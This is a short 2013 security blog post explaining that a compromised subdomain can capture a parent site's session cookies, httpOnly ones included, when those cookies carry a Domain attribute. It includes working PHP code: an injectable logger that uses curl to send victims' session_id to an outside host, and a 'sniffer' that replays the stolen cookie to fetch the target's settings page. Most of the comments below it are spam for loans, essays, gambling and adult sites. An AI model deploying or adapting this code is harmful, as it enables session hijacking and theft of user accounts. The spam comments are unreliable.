понедельник, 8 апреля 2013 г.

Exploiting server-side vulns as client-side?!!

Sounds terrible, does not it? This post is obviously of course ;)

But sometimes this is effective attack vector, for example, whenever you can exploit any subdomain (news.your-target.com) but can not exploit main domain (your-target.com).

You can track cookies at any subdomain even if they were protected by httpOnly/Security.
Look to RFC6265 http://tools.ietf.org/html/rfc6265:

4.1.2.3. The Domain Attribute
The Domain attribute specifies those hosts to which the cookie will be sent. For example, if the value of the Domain attribute is "example.com", the user agent will include the cookie in the Cookie header when making HTTP requests to example.com, www.example.com, and www.corp.example.com. (Note that a leading %x2E ("."), if present, is ignored even though that character is not permitted, but a trailing %x2E ("."), if present, will cause the user agent to ignore the attribute.) If the server omits the Domain attribute, the user agent will return the cookie only to the origin server.

Tracking cookies are possible when main server sending Set-cookie header with "domain" attribute.
Logger to inject into subdomain may looks like:
<?php
if(!isset($_COOKIE['session_id']) || !preg_match('/$ASYOUWANT^/s',$_COOKIE['session_id']) || isset($_SESSION['already_logged'])){
   //do nothing
}else{
   //exec called for asynchronous request
   exec("curl http://security-auditor.com/sniffer.php?session_id=".$_COOKIE['session_id'])." &";//httpOnly cookie of course
   $_SESSION['already_logged']=true;
}
?>
Simple code of described sniffer listed below:
<?php
$ssid = @$_GET['session_id'];
if($ssid!=""){
 // download page as a client
 $opts = array(
  'http'=>array(
    'method'=>"GET",
    'header'=>"Accept-language: en\r\n" .
              "Cookie: session_id=$ssid;\r\n"
  )
 );
 $context = stream_context_create($opts);
 $file = file_get_contents('https://target.com/settings', false, $context);
 if(!file_exists("/tmp/sess-$ssid")){
        file_put_contents("/tmp/sess-$ssid","Cookie: session_id=$ssid; \n".$file ); } }
?>

28 комментариев:

  1. What if the sub-domain has a CMS i.e. Wordpress and main domain has static or another cms, does it work?

    ОтветитьУдалить
  2. There is no difference on subdomains CMS.
    If main domain sends "Set-cookie: " with domain= attribute this should work

    ОтветитьУдалить
  3. On the off chance that you don't have credit, or you have terrible credit, and you don't have the money, how is that bill paid? If not for payday advances, that bill wouldn't be paid.
    Check Cashing San-diego

    ОтветитьУдалить
  4. So in the event that you require money quick, a bank advance is not for you. Bank credits work preferred for arranged costs over for unanticipated money related crises.
    Cash Advance Chicago

    ОтветитьУдалить
  5. So what do you do? Given the innovative headway, you can essentially sign on to an online fund website that gives quick loans.
    Payday Loans Chula-vista

    ОтветитьУдалить
  6. Since this kind of advance is regularly less demanding to acquire than a conventional bank credit, you'll have the capacity to rapidly get the money you have to dispatch a mid year business. Car Title Loans

    ОтветитьУдалить
  7. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ mua cách mua hàng mỹ online và hướng dẫn cách mua hàng giá rẻ trên ebay cùng với chành xe vận chuyển hàng hóa đi campuchia và giải đáp nên mua gì trên ebay về VN uy tín hay mua hàng trên amazon có tính thuế không tính như thế nào.

    ОтветитьУдалить
  8. Thanks for sharing this..

    3E Accounting Malaysia is the best company to hire while Company registration

    ОтветитьУдалить
  9. دانلود سریال موچین
    http://filmhayeiranijadid.tinysite.ir/post/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%B3%D8%B1%DB%8C%D8%A7%D9%84-%D9%85%D9%88%DA%86%DB%8C%D9%86/

    ОтветитьУдалить
  10. دانلود سریال موچین
    http://20dl1.parsiblog.com/Posts/215/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af+%d8%b3%d8%b1%d9%8a%d8%a7%d9%84+%d9%85%d9%88%da%86%d9%8a%d9%86/

    ОтветитьУдалить
  11. دانلود سریال موچین
    http://downloadfilmirani7.loxblog.com/post/147/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF%20%D8%B3%D8%B1%DB%8C%D8%A7%D9%84%20%D9%85%D9%88%DA%86%DB%8C%D9%86.htm

    ОтветитьУдалить
  12. Can you explain to me how this code works? I am new in servertsde system so I don't have any knowledge how it works. And if you can elaborate or explain it to me point by points. I will really appreciate it. On the other hand, while I am waiting for you to comeback, I will continue my playing and by the way, the game I am playing right now is granny 3. read more about this game by clicking the link here.


    ОтветитьУдалить
  13. Similar to a limited liability company, the owners of company shares can be either legal entities or natural persons. However, unlike a limited liability company, JSC shares can be bought and sold publicly. The maximum number of shares is unlimited and additional shares can be issued during the term of the company. There are different types of stocks, and typically the voting and dividend rights of shareholders depend on the category of stocks. Shareholders usually have the right to express their views on corporate governance and other matters such as the distribution of profits and the appointment of the council. All shareholder decisions are made during a shareholders' meeting. http://www.confiduss.com/en/info/blog/article/latvia-jsc-company-incorporation/

    ОтветитьУдалить
  14. Hello very cool web site!! Man .. Excellent .. Wonderful .. I’ll bookmark your website and take the feeds also? I’m happy to find numerous useful info here within the submit, homework writing service we need develop more strategies on this regard, thank you for sharing. . . .

    ОтветитьУдалить
  15. I like this site because so much useful stuff on here. Enjoyed reading through this, very good thankyou . 야한동영상

    Click this link
    야설

    ОтветитьУдалить
  16. Can I just say what a relief to find someone who actually knows what theyre talking about on the internet. You definitely know how to bring an issue to light and make it important. More people need to read this and understand this side of the story. I cant believe youre not more popular because you definitely have the gift.

    Click Here
    Visit Web
    Scca.com
    Information
    Click Here

    ОтветитьУдалить
  17. Youre so cool! I dont suppose Ive read anything like this before. So nice to find somebody with some original thoughts on this subject. realy thank you for starting this up. this website is something that is needed on the web, someone with a little originality. useful job for bringing something new to the internet!

    Visit Web
    Galaxyforums.net
    Information
    Click Here
    Visit Web

    ОтветитьУдалить
  18. Play Free Online Slots For Fun88
    Fun88 is a fun online casino also planet win 365 known 1xbet as Fun88 fun88 soikeotot and has over 80 different online slots, free spins and other types of games. This casino offers

    ОтветитьУдалить
  19. While the author is making the first, custom Best Website To Buy Essays composition, clients can mind progress, talk with the essayist, and add any extra data they need.

    ОтветитьУдалить
  20. HAVE A GREAT DAY TO THE CREATOR OF THIS WONDERFUL ARTICLE, I AM EXTREMELY INSPIRED WHILE HAVING READING THIS, SUPER NICE INFORMATION, THAKS FOR SHARING!
    스포츠토토

    ОтветитьУдалить
  21. HELLO, I JUST WANTED TO SAY THANK YOU FOR THIS ARTICLE THAT YOU'VE SHARED TO EVERYONE.
    STAY SAFE!
    일본야동

    ОтветитьУдалить
  22. congratulations. This is quite a good blog. Keep sharing. I love them Are you also searching for nursing writing help? we are the best solution for you.

    ОтветитьУдалить
  23. long coat that comes all around protected and a hood fixed with black widow 2021 black cotton jacket mens fur. You will find various sorts of fur around your parka hood. Either this fur is genuine or false relying upon the brand and cost of the parka.

    ОтветитьУдалить
  24. In web development, 'client side' refers to everything in a web application that is displayed or takes place on the client bulk email verifier. This includes what the user sees, such as text, images, and the rest of the UI, along with any actions that an application performs within the user's browser.

    ОтветитьУдалить